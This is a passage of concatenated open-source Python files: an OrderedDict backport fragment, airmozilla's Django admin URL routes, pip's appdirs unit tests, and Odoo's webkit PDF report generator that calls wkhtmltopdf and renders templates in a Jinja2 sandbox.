od.get(k,d), also set od[k]=d if k not in od' if key in self: return self[key] self[key] = default return default def __repr__(self, _repr_running={}): 'od.__repr__() <==> repr(od)' call_key = id(self), _get_ident() if call_key in _repr_running: return '...' 
_repr_running[call_key] = 1 try: if not self: return '%s()' % (self.__class__.__name__,) return '%s(%r)' % (self.__class__.__name__, self.items()) finally: del _repr_running[call_key] def __reduce__(self): 'Return state information for pickling' items = [[k, self[k]] for k in self] inst_dict = vars(self).copy() for k in vars(OrderedDict()): inst_dict.pop(k, None) if inst_dict: return (self.__class__, (items,), inst_dict) return self.__class__, (items,) def copy(self): 'od.copy() -> a shallow copy of od' return self.__class__(self) @classmethod def fromkeys(cls, iterable, value=None): '''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S and values equal to v (which defaults to None). ''' d = cls() for key in iterable: d[key] = value return d def __eq__(self, other): '''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive while comparison to a regular mapping is order-insensitive. ''' if isinstance(other, OrderedDict): return len(self)==len(other) and self.items() == other.items() return dict.__eq__(self, other) def __ne__(self, other): return not self == other # -- the following methods are only used in Python 2.7 -- def viewkeys(self): "od.viewkeys() -> a set-like object providing a view on od's keys" return KeysView(self) def viewvalues(self): "od.viewvalues() -> an object providing a view on od's values" return ValuesView(self) def viewitems(self): "od.viewitems() -> a set-like object providing a view on od's items" return ItemsView(self)
mit
zofuthan/airmozilla
airmozilla/manage/urls.py
5
13794
from django.conf.urls import patterns, url from .views import ( picturegallery, dashboard, events, approvals, suggestions, vidly_media, comments, loggedsearches, users, groups, channels, locations, regions, templates, topics, tags, recruitmentmessages, surveys, staticpages, url_transforms, cronlogger, permissions, autocompeter, uploads, taskstester, errors, chapters, related, ) urlpatterns = patterns( '', url(r'^/?$', dashboard.dashboard, name='dashboard'), url(r'^data/$', dashboard.dashboard_data, name='dashboard_data'), url(r'^graphs/$', dashboard.dashboard_graphs, name='dashboard_graphs'), url(r'^graphs/data/$', dashboard.dashboard_data_graphs, name='dashboard_data_graphs'), url(r'^users/(?P<id>\d+)/$', users.user_edit, name='user_edit'), url(r'^users/$', users.users, name='users'), url(r'^users/data/$', users.users_data, name='users_data'), url(r'^groups/(?P<id>\d+)/$', groups.group_edit, name='group_edit'), url(r'^groups/remove/(?P<id>\d+)/$', groups.group_remove, name='group_remove'), url(r'^groups/new/$', groups.group_new, name='group_new'), url(r'^groups/$', groups.groups, name='groups'), url(r'^events/request/$', events.event_request, name='event_request'), url(r'^events/(?P<id>\d+)/$', events.event_edit, name='event_edit'), url(r'^events/(?P<id>\d+)/privacy-vidly-mismatch/$', events.event_privacy_vidly_mismatch, name='event_privacy_vidly_mismatch'), url(r'^events/(?P<id>\d+)/assignment/$', events.event_assignment, name='event_assignment'), url(r'^events/(?P<id>\d+)/transcript/$', events.event_transcript, name='event_transcript'), url(r'^events/(?P<id>\d+)/upload/$', events.event_upload, name='event_upload'), url(r'^events/(?P<id>\d+)/vidly-submissions/$', events.event_vidly_submissions, name='event_vidly_submissions'), url(r'^events/(?P<id>\d+)/vidly-submissions/submission' r'/(?P<submission_id>\d+)/$', events.event_vidly_submission, name='event_vidly_submission'), url(r'^events/(?P<id>\d+)/comments/$', events.event_comments, name='event_comments'), 
url(r'^events/(?P<id>\d+)/comments/configuration/$', events.event_discussion, name='event_discussion'), url(r'^events/(?P<id>\d+)/stop-live/$', events.event_stop_live, name='stop_live_event'), url(r'^events/(?P<id>\d+)/delete/$', events.event_delete, name='event_delete'), url(r'^events/(?P<id>\d+)/survey/$', events.event_survey, name='event_survey'), url(r'^events/(?P<id>\d+)/tweets/$', events.event_tweets, name='event_tweets'), url(r'^events/(?P<id>\d+)/tweets/(?P<tweet_id>\d+)/$', events.edit_event_tweet, name='edit_event_tweet'), url(r'^events/(?P<id>\d+)/tweets/new/$', events.new_event_tweet, name='new_event_tweet'), url(r'^events/all/tweets/$', events.all_event_tweets, name='all_event_tweets'), url(r'^events/archive/(?P<id>\d+)/$', events.event_archive, name='event_archive'), url(r'^events/archive/(?P<id>\d+)/auto/$', events.event_archive_auto, name='event_archive_auto'), url(r'^events/(?P<id>\d+)/archive-time/$', events.event_archive_time, name='event_archive_time'), url(r'^events/fetch/duration/(?P<id>\d+)/$', events.event_fetch_duration, name='event_fetch_duration'), url(r'^events/fetch/screencaptures/(?P<id>\d+)/$', events.event_fetch_screencaptures, name='event_fetch_screencaptures'), url(r'^events/duplicate/(?P<duplicate_id>\d+)/$', events.event_request, name='event_duplicate'), url(r'^events/vidlyurltoshortcode/(?P<id>\d+)/', events.vidly_url_to_shortcode, name='vidly_url_to_shortcode'), url(r'^events/hits/$', events.event_hit_stats, name='event_hit_stats'), url(r'^events/assignments/$', events.event_assignments, name='event_assignments'), url(r'^events/assignments.ics$', events.event_assignments_ical, name='event_assignments_ical'), url(r'^events/$', events.events, name='events'), url(r'^events/data/$', events.events_data, name='events_data'), url(r'^events/redirect_thumbnail/(?P<id>\d+)/$', events.redirect_event_thumbnail, name='redirect_event_thumbnail'), url(r'^surveys/$', surveys.surveys_, name='surveys'), url(r'^surveys/new/$', surveys.survey_new, 
name='survey_new'), url(r'^surveys/(?P<id>\d+)/$', surveys.survey_edit, name='survey_edit'), url(r'^surveys/(?P<id>\d+)/delete/$', surveys.survey_delete, name='survey_delete'), url(r'^surveys/(?P<id>\d+)/questions/$', surveys.survey_questions, name='survey_questions'), url(r'^surveys/(?P<id>\d+)/question/(?P<question_id>\d+)/$', surveys.survey_question_edit, name='survey_question_edit'), url(r'^surveys/(?P<id>\d+)/question/(?P<question_id>\d+)/delete/$', surveys.survey_question_delete, name='survey_question_delete'), url(r'^surveys/(?P<id>\d+)/question/new/$', surveys.survey_question_new, name='survey_question_new'), url(r'^comments/$', comments.all_comments, name='all_comments'), url(r'^comments/(?P<id>\d+)/$', comments.comment_edit, name='comment_edit'), url(r'^events-autocomplete/$', events.event_autocomplete, name='event_autocomplete'), url(r'^channels/new/$', channels.channel_new, name='channel_new'), url(r'^channels/(?P<id>\d+)/$', channels.channel_edit, name='channel_edit'), url(r'^channels/remove/(?P<id>\d+)/$', channels.channel_remove, name='channel_remove'), url(r'^channels/$', channels.channels, name='channels'), url(r'^templates/env-autofill/$', templates.template_env_autofill, name='template_env_autofill'), url(r'^templates/new/$', templates.template_new, name='template_new'), url(r'^templates/(?P<id>\d+)/$', templates.template_edit, name='template_edit'), url(r'^templates/(?P<id>\d+)/migrate/$', templates.template_migrate, name='template_migrate'), url(r'^templates/remove/(?P<id>\d+)/$', templates.template_remove, name='template_remove'), url(r'^templates/$', templates.templates, name='templates'), url(r'^tags/$', tags.tags, name='tags'), url(r'^tags/data/$', tags.tags_data, name='tags_data'), url(r'^tags/(?P<id>\d+)/$', tags.tag_edit, name='tag_edit'), url(r'^tags/(?P<id>\d+)/remove/$', tags.tag_remove, name='tag_remove'), url(r'^tags/(?P<id>\d+)/merge/$', tags.tag_merge, name='tag_merge'), url(r'^tags/(?P<id>\d+)/merge/repeated/$', 
tags.tag_merge_repeated, name='tag_merge_repeated'), url(r'^locations/new/$', locations.location_new, name='location_new'), url(r'^locations/(?P<id>\d+)/$', locations.location_edit, name='location_edit'), url(r'^locations/remove/(?P<id>\d+)/$', locations.location_remove, name='location_remove'), url(r'^locations/tz/$', locations.location_timezone, name='location_timezone'), url(r'^locations/$', locations.locations, name='locations'), url(r'^regions/new/$', regions.region_new, name='region_new'), url(r'^regions/(?P<id>\d+)/$', regions.region_edit, name='region_edit'), url(r'^regions/remove/(?P<id>\d+)/$', regions.region_remove, name='region_remove'), url(r'^regions/$', regions.regions, name='regions'), url(r'^topics/new/$', topics.topic_new, name='topic_new'), url(r'^topics/(?P<id>\d+)/$', topics.topic_edit, name='topic_edit'), url(r'^topics/remove/(?P<id>\d+)/$', topics.topic_remove, name='topic_remove'), url(r'^topics/$', topics.topics, name='topics'), url(r'^approvals/$', approvals.approvals, name='approvals'), url(r'^approvals/reconsider/$', approvals.approval_reconsider, name='approval_reconsider'), url(r'^approvals/(?P<id>\d+)/$', approvals.approval_review, name='approval_review'), url(r'^pages/$', staticpages.staticpages, name='staticpages'), url(r'^pages/new/$', staticpages.staticpage_new, name='staticpage_new'), url(r'^pages/(?P<id>\d+)/$', staticpages.staticpage_edit, name='staticpage_edit'), url(r'^pages/remove/(?P<id>\d+)/$', staticpages.staticpage_remove, name='staticpage_remove'), url(r'^suggestions/$', suggestions.suggestions, name='suggestions'), url(r'^suggestions/(?P<id>\d+)/$', suggestions.suggestion_review, name='suggestion_review'), url(r'^vidly/$', vidly_media.vidly_media, name='vidly_media'), url(r'^vidly/timings/$', vidly_media.vidly_media_timings, name='vidly_media_timings'), url(r'^vidly/timings/data/$', vidly_media.vidly_media_timings_data, name='vidly_media_timings_data'), url(r'^vidly/webhook/$', vidly_media.vidly_media_webhook, 
name='vidly_media_webhook'), url(r'^vidly/status/$', vidly_media.vidly_media_status, name='vidly_media_status'), url(r'^vidly/info/$', vidly_media.vidly_media_info, name='vidly_media_info'), url(r'^vidly/resubmit/$', vidly_media.vidly_media_resubmit, name='vidly_media_resubmit'), url(r'^urltransforms/$', url_transforms.url_transforms, name='url_transforms'), url(r'^urltransforms/new/$', url_transforms.url_match_new, name='url_match_new'), url(r'^urltransforms/run/$', url_transforms.url_match_run, name='url_match_run'), url(r'^urltransforms/(?P<id>\d+)/remove/$', url_transforms.url_match_remove, name='url_match_remove'), url(r'^urltransforms/(?P<id>\d+)/add/$', url_transforms.url_transform_add, name='url_transform_add'), url(r'^urltransforms/(?P<id>\d+)/(?P<transform_id>\d+)/remove/$', url_transforms.url_transform_remove, name='url_transform_remove'), url(r'^urltransforms/(?P<id>\d+)/(?P<transform_id>\d+)/edit/$', url_transforms.url_transform_edit, name='url_transform_edit'), url(r'^cron-pings/$', cronlogger.cron_pings, name='cron_pings'), url(r'^curated-groups-autocomplete/', groups.curated_groups_autocomplete, name='curated_groups_autocomplete'), url(r'^insufficient-permissions/', permissions.insufficient_permissions, name='insufficient_permissions'), url(r'^recruitmentmessages/$', recruitmentmessages.recruitmentmessages, name='recruitmentmessages'), url(r'^recruitmentmessages/new/$', recruitmentmessages.recruitmentmessage_new, name='recruitmentmessage_new'), url(r'^recruitmentmessages/(?P<id>\d+)/$', recruitmentmessages.recruitmentmessage_edit, name='recruitmentmessage_edit'), url(r'^recruitmentmessages/(?P<id>\d+)/delete/$', recruitmentmessages.recruitmentmessage_delete, name='recruitmentmessage_delete'), url(r'^events/(?P<event_id>\d+)/chapters/$', chapters.event_chapters, name='event_chapters'), url(r'^events/(?P<event_id>\d+)/chapters/new/$', chapters.event_chapter_new, name='event_chapter_new'), url(r'^events/(?P<event_id>\d+)/chapters/(?P<id>\d+)/$', 
chapters.event_chapter_edit, name='event_chapter_edit'), url(r'^events/(?P<event_id>\d+)/chapters/(?P<id>\d+)/delete/$', chapters.event_chapter_delete, name='event_chapter_delete'), url(r'^uploads/$', uploads.uploads, name='uploads'), url(r'^loggedsearches/$', loggedsearches.loggedsearches, name='loggedsearches'), url(r'^loggedsearches/stats/$', loggedsearches.loggedsearches_stats, name='loggedsearches_stats'), url(r'^picturegallery/$', picturegallery.picturegallery, name='picturegallery'), url(r'^picturegallery/data/$', picturegallery.picturegallery_data, name='picturegallery_data'), url(r'^picturegallery/add/$', picturegallery.picture_add, name='picture_add'), url(r'^picturegallery/(?P<id>\d+)/$', picturegallery.picture_edit, name='picture_edit'), url(r'^picturegallery/(?P<id>\d+)/delete/$', picturegallery.picture_delete, name='picture_delete'), url(r'^picturegallery/(?P<id>\d+)/delete-all/$', picturegallery.picture_delete_all, name='picture_delete_all'), url(r'^picturegallery/(?P<id>\d+)/redirect_thumbnail/$', picturegallery.redirect_picture_thumbnail, name='redirect_picture_thumbnail'), url(r'^picturegallery/(?P<id>\d+)/event_associate/$', picturegallery.picture_event_associate, name='picture_event_associate'), url(r'^cronlogger/$', cronlogger.cronlogger_home, name='cronlogger'), url(r'^cronlogger/data/$', cronlogger.cronlogger_data, name='cronlogger_data'), url(r'^autocompeter/$', autocompeter.autocompeter_home, name='autocompeter'), url(r'^autocompeter/stats/$', autocompeter.autocompeter_stats, name='autocompeter_stats'), url(r'^autocompeter/test/$', autocompeter.autocompeter_test, name='autocompeter_test'), url(r'^tasks/tester/$', taskstester.tasks_tester, name='tasks_tester'), url(r'^errors/trigger/$', errors.error_trigger, name='error_trigger'), url(r'^related/$', related.related_content, name='related_content'), url(r'^related/testing/$', related.related_content_testing, name='related_content_testing'), )
bsd-3-clause
luzfcb/pip
tests/unit/test_appdirs.py
4
7219
import sys import pretend from pip.utils import appdirs class TestUserCacheDir: def test_user_cache_dir_win(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_cache_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip\\Cache") assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_cache_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert appdirs.user_cache_dir("pip") == "/home/test/Library/Caches/pip" def test_user_cache_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_CACHE_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_cache_dir("pip") == "/home/test/.cache/pip" def test_user_cache_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CACHE_HOME", "/home/test/.other-cache") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_cache_dir("pip") == "/home/test/.other-cache/pip" class TestSiteConfigDirs: def test_site_config_dirs_win(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\ProgramData" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) result = [ e.replace("/", "\\") for e in appdirs.site_config_dirs("pip") ] assert result == ["C:\\ProgramData\\pip"] assert _get_win_folder.calls == [pretend.call("CSIDL_COMMON_APPDATA")] def test_site_config_dirs_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert appdirs.site_config_dirs("pip") == \ ["/Library/Application Support/pip"] def test_site_config_dirs_linux(self, monkeypatch): 
monkeypatch.delenv("XDG_CONFIG_DIRS") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.site_config_dirs("pip") == [ '/etc/xdg/pip', '/etc' ] def test_site_config_dirs_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CONFIG_DIRS", "/spam:/etc:/etc/xdg") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.site_config_dirs("pip") == [ '/spam/pip', '/etc/pip', '/etc/xdg/pip', '/etc' ] class TestUserDataDir: def test_user_data_dir_win_no_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_data_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip") assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_data_dir_win_yes_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Roaming" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert ( appdirs.user_data_dir("pip", roaming=True).replace("/", "\\") == "C:\\Users\\test\\AppData\\Roaming\\pip" ) assert _get_win_folder.calls == [pretend.call("CSIDL_APPDATA")] def test_user_data_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert (appdirs.user_data_dir("pip") == "/home/test/Library/Application Support/pip") def test_user_data_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_DATA_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_data_dir("pip") == "/home/test/.local/share/pip" def test_user_data_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_DATA_HOME", "/home/test/.other-share") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, 
"platform", "linux2") assert appdirs.user_data_dir("pip") == "/home/test/.other-share/pip" class TestUserConfigDir: def test_user_config_dir_win_no_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert ( appdirs.user_config_dir("pip", roaming=False).replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip" ) assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_config_dir_win_yes_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Roaming" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_config_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Roaming\\pip") assert _get_win_folder.calls == [pretend.call("CSIDL_APPDATA")] def test_user_config_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert (appdirs.user_config_dir("pip") == "/home/test/Library/Application Support/pip") def test_user_config_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_CONFIG_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_config_dir("pip") == "/home/test/.config/pip" def test_user_config_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CONFIG_HOME", "/home/test/.other-config") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_config_dir("pip") == "/home/test/.other-config/pip"
mit
rruebner/odoo
addons/report_webkit/webkit_report.py
26
16606
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com) # All Right Reserved # # Author : Nicolas Bessi (Camptocamp) # Contributor(s) : Florent Xicluna (Wingo SA) # # WARNING: This program as such is intended to be used by professional # programmers who take the whole responsability of assessing all potential # consequences resulting from its eventual inadequacies and bugs # End users who are looking for a ready-to-use solution with commercial # garantees and support are strongly adviced to contract a Free Software # Service Company # # This program is Free Software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # ############################################################################## import subprocess import os import sys from openerp import report import tempfile import time import logging from functools import partial from report_helper import WebKitHelper import openerp from openerp.modules.module import get_module_resource from openerp.report.report_sxw import * from openerp import tools from openerp.tools.translate import _ from openerp.osv.osv import except_osv from urllib import urlencode, quote as quote _logger = logging.getLogger(__name__) try: # We use a jinja2 sandboxed environment to render mako templates. 
# Note that the rendering does not cover all the mako syntax, in particular
# arbitrary Python statements are not accepted, and not all expressions are
# allowed: only "public" attributes (not starting with '_') of objects may
# be accessed.
# This is done on purpose: it prevents incidental or malicious execution of
# Python code that may break the security of the server.
    # NOTE(review): the following lines sit inside a "try:" opened above this
    # chunk; the matching "except ImportError" is below.  A Jinja2 sandbox is
    # (ab)used as a mako-syntax-compatible template engine.
    from jinja2.sandbox import SandboxedEnvironment
    mako_template_env = SandboxedEnvironment(
        block_start_string="<%",
        block_end_string="%>",
        variable_start_string="${",
        variable_end_string="}",
        comment_start_string="<%doc>",
        comment_end_string="</%doc>",
        line_statement_prefix="%",
        line_comment_prefix="##",
        trim_blocks=True,               # do not output newline after blocks
        autoescape=True,                # XML/HTML automatic escaping
    )
    # Expose a minimal set of helpers to the sandboxed templates.
    mako_template_env.globals.update({
        'str': str,
        'quote': quote,
        'urlencode': urlencode,
    })
except ImportError:
    # Templating degrades gracefully when jinja2 is missing.
    _logger.warning("jinja2 not available, templating features will not work!")


def mako_template(text):
    """Build a Mako template.

    This template uses UTF-8 encoding
    """
    return mako_template_env.from_string(text)


# Registry mapping a report xml id to the list of context-extender callbacks
# registered for it via webkit_report_extender().
_extender_functions = {}


def webkit_report_extender(report_name):
    """
    A decorator to define functions to extend the context used in a template
    rendering. report_name must be the xml id of the desired report (it is
    mandatory to indicate the module in that xml id).
    The given function will be called at the creation of the report. The
    following arguments will be passed to it (in this order):
    - pool The model pool.
    - cr The cursor.
    - uid The user id.
    - localcontext The context given to the template engine to render the
      templates for the current report. This is the context that should be
      modified.
    - context The OpenERP context.
    """
    def fct1(fct):
        # Append fct to the per-report list, creating the list on first use.
        lst = _extender_functions.get(report_name)
        if not lst:
            lst = []
            _extender_functions[report_name] = lst
        lst.append(fct)
        return fct
    return fct1


class WebKitParser(report_sxw):
    """Custom class that use webkit to render HTML reports
       Code partially taken from report openoffice. Thanks guys :)
    """

    def __init__(self, name, table, rml=False, parser=rml_parse,
                 header=True, store=False, register=True):
        self.localcontext = {}
        report_sxw.__init__(self, name, table, rml, parser,
                            header, store, register=register)

    def get_lib(self, cursor, uid):
        """Return the lib wkhtml path"""
        # First honour the explicit 'webkit_path' ir.config_parameter,
        # then fall back to searching PATH (plus the server root) for the
        # wkhtmltopdf executable.
        proxy = self.pool['ir.config_parameter']
        webkit_path = proxy.get_param(cursor, uid, 'webkit_path')
        if not webkit_path:
            try:
                defpath = os.environ.get('PATH', os.defpath).split(os.pathsep)
                if hasattr(sys, 'frozen'):
                    # frozen (py2exe-style) builds ship the binary next to the cwd
                    defpath.append(os.getcwd())
                if tools.config['root_path']:
                    defpath.append(os.path.dirname(tools.config['root_path']))
                webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath))
            except IOError:
                webkit_path = None
        if webkit_path:
            return webkit_path
        raise except_osv(
            _('Wkhtmltopdf library path is not set'),
            _('Please install executable on your system'
              ' (sudo apt-get install wkhtmltopdf) or download it from here:'
              ' http://code.google.com/p/wkhtmltopdf/downloads/list and set the'
              ' path in the ir.config_parameter with the webkit_path key.'
              'Minimal version is 0.9.9')
        )

    def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False):
        """Call webkit in order to generate pdf"""
        # Builds a wkhtmltopdf command line from the webkit_header settings,
        # writes header/footer/bodies to temp HTML files, runs the binary and
        # returns the PDF bytes.  All temp files are removed in the finally
        # block, even on failure.
        if not webkit_header:
            webkit_header = report_xml.webkit_header
        fd, out_filename = tempfile.mkstemp(suffix=".pdf", prefix="webkit.tmp.")
        file_to_del = [out_filename]
        if comm_path:
            command = [comm_path]
        else:
            command = ['wkhtmltopdf']
        command.append('--quiet')
        # default to UTF-8 encoding.  Use <meta charset="latin-1"> to override.
        command.extend(['--encoding', 'utf-8'])
        if header :
            with tempfile.NamedTemporaryFile(suffix=".head.html", delete=False) as head_file:
                head_file.write(self._sanitize_html(header.encode('utf-8')))
            file_to_del.append(head_file.name)
            command.extend(['--header-html', head_file.name])
        if footer :
            with tempfile.NamedTemporaryFile(suffix=".foot.html", delete=False) as foot_file:
                foot_file.write(self._sanitize_html(footer.encode('utf-8')))
            file_to_del.append(foot_file.name)
            command.extend(['--footer-html', foot_file.name])
        # wkhtmltopdf expects decimal points, not locale commas, hence the
        # replace(',', '.') on every numeric option.
        if webkit_header.margin_top :
            command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')])
        if webkit_header.margin_bottom :
            command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')])
        if webkit_header.margin_left :
            command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')])
        if webkit_header.margin_right :
            command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')])
        if webkit_header.orientation :
            command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')])
        if webkit_header.format :
            command.extend(['--page-size', str(webkit_header.format).replace(',', '.')])
        count = 0
        for html in html_list :
            with tempfile.NamedTemporaryFile(suffix="%d.body.html" % count, delete=False) as html_file:
                count += 1
                html_file.write(self._sanitize_html(html.encode('utf-8')))
            file_to_del.append(html_file.name)
            command.append(html_file.name)
        command.append(out_filename)
        stderr_fd, stderr_path = tempfile.mkstemp(text=True)
        file_to_del.append(stderr_path)
        try:
            status = subprocess.call(command, stderr=stderr_fd)
            os.close(stderr_fd)  # ensure flush before reading
            stderr_fd = None  # avoid closing again in finally block
            fobj = open(stderr_path, 'r')
            error_message = fobj.read()
            fobj.close()
            if not error_message:
                error_message = _('No diagnosis message was provided')
            else:
                error_message = _('The following diagnosis message was provided:\n') + error_message
            if status :
                raise except_osv(_('Webkit error' ),
                                 _("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message))
            with open(out_filename, 'rb') as pdf_file:
                pdf = pdf_file.read()
            os.close(fd)
        finally:
            if stderr_fd is not None:
                os.close(stderr_fd)
            for f_to_del in file_to_del:
                try:
                    os.unlink(f_to_del)
                except (OSError, IOError), exc:
                    _logger.error('cannot remove file %s: %s', f_to_del, exc)
        return pdf

    def translate_call(self, parser_instance, src):
        """Translate String."""
        # Look the source string up in ir.translation for the current report
        # template; fall back to a name-less lookup, then to the source itself.
        ir_translation = self.pool['ir.translation']
        name = self.tmpl and 'addons/' + self.tmpl or None
        res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
                                         name, 'report',
                                         parser_instance.localcontext.get('lang', 'en_US'), src)
        if res == src:
            # no translation defined, fallback on None (backward compatibility)
            res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
                                             None, 'report',
                                             parser_instance.localcontext.get('lang', 'en_US'), src)
        if not res :
            return src
        return res

    # override needed to keep the attachments storing procedure
    def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None):
        """generate the PDF"""
        # just try to find an xml id for the report
        cr = cursor
        pool = openerp.registry(cr.dbname)
        found_xml_ids = pool["ir.model.data"].search(cr, uid,
                                                     [["model", "=", "ir.actions.report.xml"],
                                                      ["res_id", "=", report_xml.id]], context=context)
        xml_id = None
        if found_xml_ids:
            xml_id = pool["ir.model.data"].read(cr, uid, found_xml_ids[0], ["module", "name"])
            xml_id = "%s.%s" % (xml_id["module"], xml_id["name"])
        if context is None:
            context={}
        htmls = []
        if report_xml.report_type != 'webkit':
            # not a webkit report: defer to the stock rendering pipeline
            return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data,
                                                              report_xml, context=context)
        parser_instance = self.parser(cursor, uid, self.name2, context=context)
        self.pool = pool
        objs = self.getObjects(cursor, uid, ids, context)
        parser_instance.set_context(objs, data, ids, report_xml.report_type)
        # Template source: on-disk report_file first, then the inline
        # report_webkit_data field.
        template = False
        if report_xml.report_file :
            path = get_module_resource(*report_xml.report_file.split('/'))
            if path and os.path.exists(path) :
                template = file(path).read()
        if not template and report_xml.report_webkit_data :
            template = report_xml.report_webkit_data
        if not template :
            raise except_osv(_('Error!'), _('Webkit report template not found!'))
        header = report_xml.webkit_header.html
        footer = report_xml.webkit_header.footer_html
        if not header and report_xml.use_global_header:
            raise except_osv(
                _('No header defined for this Webkit report!'),
                _('Please set a header in company settings.')
            )
        if not report_xml.use_global_header :
            header = ''
            default_head = get_module_resource('report_webkit', 'default_header.html')
            with open(default_head,'r') as f:
                header = f.read()
        css = report_xml.webkit_header.css
        if not css :
            css = ''
        translate_call = partial(self.translate_call, parser_instance)
        body_mako_tpl = mako_template(template)
        helper = WebKitHelper(cursor, uid, report_xml.id, context)
        parser_instance.localcontext['helper'] = helper
        parser_instance.localcontext['css'] = css
        parser_instance.localcontext['_'] = translate_call
        # apply extender functions
        # NOTE(review): 'additional' is assigned but never used here.
        additional = {}
        if xml_id in _extender_functions:
            for fct in _extender_functions[xml_id]:
                fct(pool, cr, uid, parser_instance.localcontext, context)
        if report_xml.precise_mode:
            # precise mode renders the body once per record
            ctx = dict(parser_instance.localcontext)
            for obj in parser_instance.localcontext['objects']:
                ctx['objects'] = [obj]
                try :
                    html = body_mako_tpl.render(dict(ctx))
                    htmls.append(html)
                except Exception, e:
                    msg = u"%s" % e
                    _logger.error(msg)
                    raise except_osv(_('Webkit render!'), msg)
        else:
            try :
                html = body_mako_tpl.render(dict(parser_instance.localcontext))
                htmls.append(html)
            except Exception, e:
                msg = u"%s" % e
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
        head_mako_tpl = mako_template(header)
        try :
            head = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=False))
        except Exception, e:
            raise except_osv(_('Webkit render!'), u"%s" % e)
        foot = False
        if footer :
            foot_mako_tpl = mako_template(footer)
            try :
                foot = foot_mako_tpl.render(dict(parser_instance.localcontext))
            except Exception, e:
                msg = u"%s" % e
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
        if report_xml.webkit_debug :
            # debug mode: return the rendered HTML (bodies injected via _debug)
            # instead of invoking wkhtmltopdf
            try :
                deb = head_mako_tpl.render(dict(parser_instance.localcontext,
                                                _debug=tools.ustr("\n".join(htmls))))
            except Exception, e:
                msg = u"%s" % e
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
